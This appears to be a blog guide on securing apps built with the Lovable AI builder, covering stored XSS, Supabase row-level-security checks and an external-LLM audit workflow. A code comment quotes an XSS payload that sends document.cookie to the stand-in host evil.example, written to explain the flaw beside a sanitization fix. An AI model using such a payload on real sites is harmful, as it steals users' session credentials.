How to Secure Your Lovable Apps

Speed is the primary promise of AI development. Tools like Lovable allow founders to ship functional applications in record time. However, speed often comes at the cost of security.

In a recent internal demonstration, our team ran security checks on a job board application built entirely with AI. Despite looking fully functional, the application had critical vulnerabilities. Within seconds, we were able to:

  1. Bypass Admin Approval: We posted a "live" job as a standard user, completely skipping the required administrative review process.
  2. Inject Malicious Code: We submitted a job listing containing a hidden script that stole the admin’s credentials the moment they viewed the dashboard.

Most concerning was that the platform's built-in scanner failed to detect either issue.
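
The second issue is a classic stored Cross-Site Scripting (XSS) flaw: untrusted job content is rendered as live HTML in the admin's browser. As a rough, hypothetical sketch (not the demo app's actual code), the vulnerable pattern and a common fix in a React/TypeScript dashboard might look like this, assuming an illustrative JobRow component and the dompurify library:

import DOMPurify from "dompurify";

// Vulnerable: attacker-controlled HTML is rendered directly into the admin dashboard.
// A description containing <img src=x onerror="fetch('https://evil.example?c=' + document.cookie)">
// executes in the admin's session the moment the row is displayed.
function UnsafeJobRow({ description }: { description: string }) {
  return <td dangerouslySetInnerHTML={{ __html: description }} />;
}

// Safer: sanitize untrusted HTML before rendering it.
function SafeJobRow({ description }: { description: string }) {
  return <td dangerouslySetInnerHTML={{ __html: DOMPurify.sanitize(description) }} />;
}

If rich text is not a genuine requirement, rendering the description as plain JSX text ({description}) avoids the problem entirely.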

The missed detections highlight a fundamental reality of AI development: AI agents are designed to build, not to secure. When you rely on the same AI to write and check its own code, you introduce a "blind spot."

This guide outlines our internal framework for hardening AI-generated applications using an external Security Prompt workflow.

Watch the video guide to learn the right way to audit your code using GitHub:

The "External Security Prompt" Framework

To properly secure an app built with Lovable (or any AI builder), you must decouple the builder from the security checker. An external Large Language Model (LLM) with fresh context is required to execute these prompts effectively.

Step 1: Connect the Codebase

A common mistake is copying and pasting individual files for checks. For a comprehensive review, the external AI needs access to the full repository context.

  • Recommended Tools: Claude (via Projects) or ChatGPT (via GitHub integration).
  • Action: Connect the GitHub repository directly to the LLM. This allows the AI to traverse the file structure and understand dependencies before running the security prompts.

Step 2: Run Targeted Security Prompts

Generic instructions like "check this for bugs" are insufficient. We utilize specific Security Prompts designed to identify distinct vulnerability classes, such as Cross-Site Scripting (XSS) or insecure API endpoints.

  • The Process: Input a specialized security prompt from our library into the external LLM.
  • The Output: The model will generate a detailed report flagging specific lines of code that pose security risks.

Step 3: The "One-by-One" Remediation Strategy

Crucial Rule: Do not dump the entire security report back into the building agent.

AI models degrade in performance when they are overloaded with context. Instead, work through the report incrementally:

  1. Review: Analyze the report manually.
  2. Isolate: Ask the external AI to summarize one specific issue and generate a fix instruction.
  3. Remediate: Feed that single fix instruction back into Lovable.
  4. Repeat: Cycle through the report one vulnerability at a time.

Deep Dive: Fixing Database Permissions (RLS)

Simple code scans often miss Row Level Security (RLS) vulnerabilities. This was the specific flaw that allowed us to bypass the admin approval process in our demo. The code was syntactically correct, but the logic was flawed.

To catch this, we use a two-step Security Prompt sequence:

1. The Authorization Rules Writer

First, we run a prompt that analyzes the application's intended logic and writes out plain-English rules.

  • Example Output: "Users can create draft jobs. Only Admins can update status to 'Active'."

2. The RLS Policy Analyzer

Next, we run a prompt that compares those written rules against the actual database policies (e.g., in Supabase/PostgreSQL). This cross-reference highlights where the code fails to enforce the business logic.
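
As a concrete illustration of the gap this comparison catches, here is a minimal sketch (TypeScript with the @supabase/supabase-js client; the jobs table, status column, and environment variable names are illustrative assumptions, not taken from the demo app) that attempts the exact action the written rule forbids. With correct RLS the update is rejected or silently affects zero rows; with a missing or flawed policy, the admin-approval bypass succeeds:

import { createClient } from "@supabase/supabase-js";

// The public anon key: the same credentials any visitor's browser already has.
const supabase = createClient(process.env.SUPABASE_URL!, process.env.SUPABASE_ANON_KEY!);

// Attempt what the business rule says only admins may do:
// promote a job from "draft" straight to "active".
async function probeAdminBypass(jobId: string) {
  const { data, error } = await supabase
    .from("jobs")
    .update({ status: "active" })
    .eq("id", jobId)
    .select();

  if (error) {
    console.log("Update rejected (RLS check violation):", error.message);
  } else if (!data || data.length === 0) {
    console.log("Update affected no rows: RLS filtered the target, as the rule requires.");
  } else {
    console.log("Vulnerable: a non-admin promoted the job to active:", data);
  }
}

The fix belongs in the database itself: a policy that lets standard users update only their own draft jobs and reserves the change to "Active" for admins, enforced by Supabase rather than by front-end code the user can bypass.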

The Zero-Cost Security Method

For teams without access to paid LLM subscriptions (like Claude Pro or ChatGPT Team), effective security checks are still possible using GitHub Codespaces and Google’s Gemini.

1. Initialize the Environment

Navigate to the GitHub repository and launch a "Codespace." This creates a cloud-based development environment directly in the browser.

2. Install the Gemini CLI

Google’s Gemini model offers a high-performance free tier suitable for running security prompts. In the Codespace terminal, install the necessary tools:

npm install -g @google/gemini-cli

3. Authenticate and Secure

Launch the CLI by running gemini in the terminal and authenticate with a personal Google account to access the free tier. Once logged in, you can paste the security prompts directly into the command line, and Gemini will process the codebase and produce a level of analysis comparable to the paid alternatives.

Access 20+ Free Security Prompts

We have compiled the full suite of 20+ Security Prompts used in our process, covering input validation, authentication logic, and spam prevention.

Conclusion

Building with AI does not eliminate the need for engineering discipline. If a team is "vibe coding" (building via prompts without security reviews), it is likely deploying vulnerabilities.

To ensure your application is production-ready:

  • Separate concerns: Never use the builder to check itself.
  • Context matters: Give the external AI access to the full repository.
  • Iterate: Fix vulnerabilities individually to maintain code stability.
